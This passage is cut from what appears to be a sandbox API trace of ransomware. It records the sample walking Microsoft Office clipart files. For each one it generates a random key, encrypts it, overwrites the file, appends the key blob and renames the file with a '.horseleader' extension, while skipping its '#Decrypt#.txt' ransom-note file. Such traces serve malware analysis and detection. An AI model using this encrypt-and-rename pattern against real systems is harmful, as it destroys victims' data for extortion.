lpNumberOfBytesRead=0x32aedf4*=0x1ccc, lpOverlapped=0x0) returned 1 [0252.789] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe334, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.789] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ccc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x1ccc, lpOverlapped=0x0) returned 1 [0252.789] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.789] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.790] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.790] CloseHandle (hObject=0x158) returned 1 [0252.790] GetProcessHeap () returned 0x780000 [0252.790] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.790] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.horseleader") returned 79 [0252.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.horseleader")) returned 1 [0252.791] GetProcessHeap () returned 0x780000 [0252.791] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a5800, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe37a5800, 
ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1d74, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02122_.WMF", cAlternateFileName="")) returned 1 [0252.792] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="Windows") returned -1 [0252.792] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0252.792] StrStrIW (lpFirst="AN02122_.WMF", lpSrch=".horseleader") returned 0x0 [0252.792] lstrcmpW (lpString1="AN02122_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.792] lstrcmpW (lpString1="AN02122_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.792] lstrlenW (lpString=".testttjffg") returned 11 [0252.792] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.792] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.792] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0252.793] StrStrW (lpFirst="AN02122_.WMF", lpSrch=".txt") returned 0x0 [0252.793] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7540) returned 1 [0252.794] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1d74, lpOverlapped=0x0) returned 1 [0252.795] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe28c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1d74, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1d74, lpOverlapped=0x0) returned 1 [0252.796] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.796] CloseHandle (hObject=0x158) returned 1 [0252.796] GetProcessHeap () returned 0x780000 [0252.797] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.797] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.horseleader") returned 79 [0252.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.horseleader")) returned 1 [0252.797] GetProcessHeap () 
returned 0x780000 [0252.797] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec9bd00, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcec9bd00, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02559_.WMF", cAlternateFileName="")) returned 1 [0252.798] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="Windows") returned -1 [0252.798] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0252.798] StrStrIW (lpFirst="AN02559_.WMF", lpSrch=".horseleader") returned 0x0 [0252.798] lstrcmpW (lpString1="AN02559_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.798] lstrcmpW (lpString1="AN02559_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.798] lstrlenW (lpString=".testttjffg") returned 11 [0252.798] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.798] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.798] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0252.799] StrStrW (lpFirst="AN02559_.WMF", lpSrch=".txt") returned 0x0 [0252.799] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6632) returned 1 [0252.799] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19e8, lpOverlapped=0x0) returned 1 [0252.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe618, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.835] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19e8, lpOverlapped=0x0) returned 1 [0252.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.836] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.836] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.836] CloseHandle (hObject=0x158) returned 1 [0252.836] GetProcessHeap () returned 0x780000 [0252.836] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.836] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.horseleader") returned 79 
[0252.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02559_.wmf.horseleader")) returned 1 [0252.837] GetProcessHeap () returned 0x780000 [0252.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.837] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6bc300, ftCreationTime.dwHighDateTime=0x1bd4c00, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b6bc300, ftLastWriteTime.dwHighDateTime=0x1bd4c00, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02724_.WMF", cAlternateFileName="")) returned 1 [0252.838] lstrcmpiW (lpString1="AN02724_.WMF", lpString2="Windows") returned -1 [0252.838] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0252.838] StrStrIW (lpFirst="AN02724_.WMF", lpSrch=".horseleader") returned 0x0 [0252.838] lstrcmpW (lpString1="AN02724_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.838] lstrcmpW (lpString1="AN02724_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.838] lstrlenW (lpString=".testttjffg") returned 11 [0252.838] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.838] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.838] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 67 [0252.841] StrStrW (lpFirst="AN02724_.WMF", lpSrch=".txt") returned 0x0 [0252.841] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2108) returned 1 [0252.841] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x83c, lpOverlapped=0x0) returned 1 [0252.860] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.860] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x83c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x83c, lpOverlapped=0x0) returned 1 [0252.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.861] CloseHandle (hObject=0x158) returned 1 [0252.861] GetProcessHeap () returned 0x780000 [0252.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.horseleader") returned 79 [0252.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.horseleader")) returned 1 [0252.862] GetProcessHeap () returned 0x780000 [0252.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.862] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c87b100, ftCreationTime.dwHighDateTime=0x1bd4c18, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c87b100, ftLastWriteTime.dwHighDateTime=0x1bd4c18, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN03500_.WMF", cAlternateFileName="")) returned 1 [0252.862] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="Windows") returned -1 [0252.862] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0252.862] StrStrIW (lpFirst="AN03500_.WMF", lpSrch=".horseleader") returned 0x0 [0252.862] lstrcmpW (lpString1="AN03500_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.862] lstrcmpW 
(lpString1="AN03500_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.862] lstrlenW (lpString=".testttjffg") returned 11 [0252.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0252.864] StrStrW (lpFirst="AN03500_.WMF", lpSrch=".txt") returned 0x0 [0252.864] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9240) returned 1 [0252.864] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2418, lpOverlapped=0x0) returned 1 [0252.913] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdbe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.913] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2418, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2418, lpOverlapped=0x0) returned 1 [0252.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0x0) returned 1 [0252.914] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.914] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.914] CloseHandle (hObject=0x158) returned 1 [0252.914] GetProcessHeap () returned 0x780000 [0252.914] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.914] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.horseleader") returned 79 [0252.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.horseleader")) returned 1 [0252.915] GetProcessHeap () returned 0x780000 [0252.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.916] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x928, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04108_.WMF", cAlternateFileName="")) returned 1 [0252.916] 
lstrcmpiW (lpString1="AN04108_.WMF", lpString2="Windows") returned -1 [0252.916] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0252.916] StrStrIW (lpFirst="AN04108_.WMF", lpSrch=".horseleader") returned 0x0 [0252.916] lstrcmpW (lpString1="AN04108_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.916] lstrcmpW (lpString1="AN04108_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.916] lstrlenW (lpString=".testttjffg") returned 11 [0252.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.917] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0252.917] StrStrW (lpFirst="AN04108_.WMF", lpSrch=".txt") returned 0x0 [0252.917] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2344) returned 1 [0252.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x928, lpOverlapped=0x0) returned 1 [0252.920] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6d8, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x928, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x928, lpOverlapped=0x0) returned 1 [0252.920] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.920] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.920] CloseHandle (hObject=0x158) returned 1 [0252.920] GetProcessHeap () returned 0x780000 [0252.920] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.horseleader") returned 79 [0252.921] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.horseleader")) returned 1 [0252.922] GetProcessHeap () returned 0x780000 [0252.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.922] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
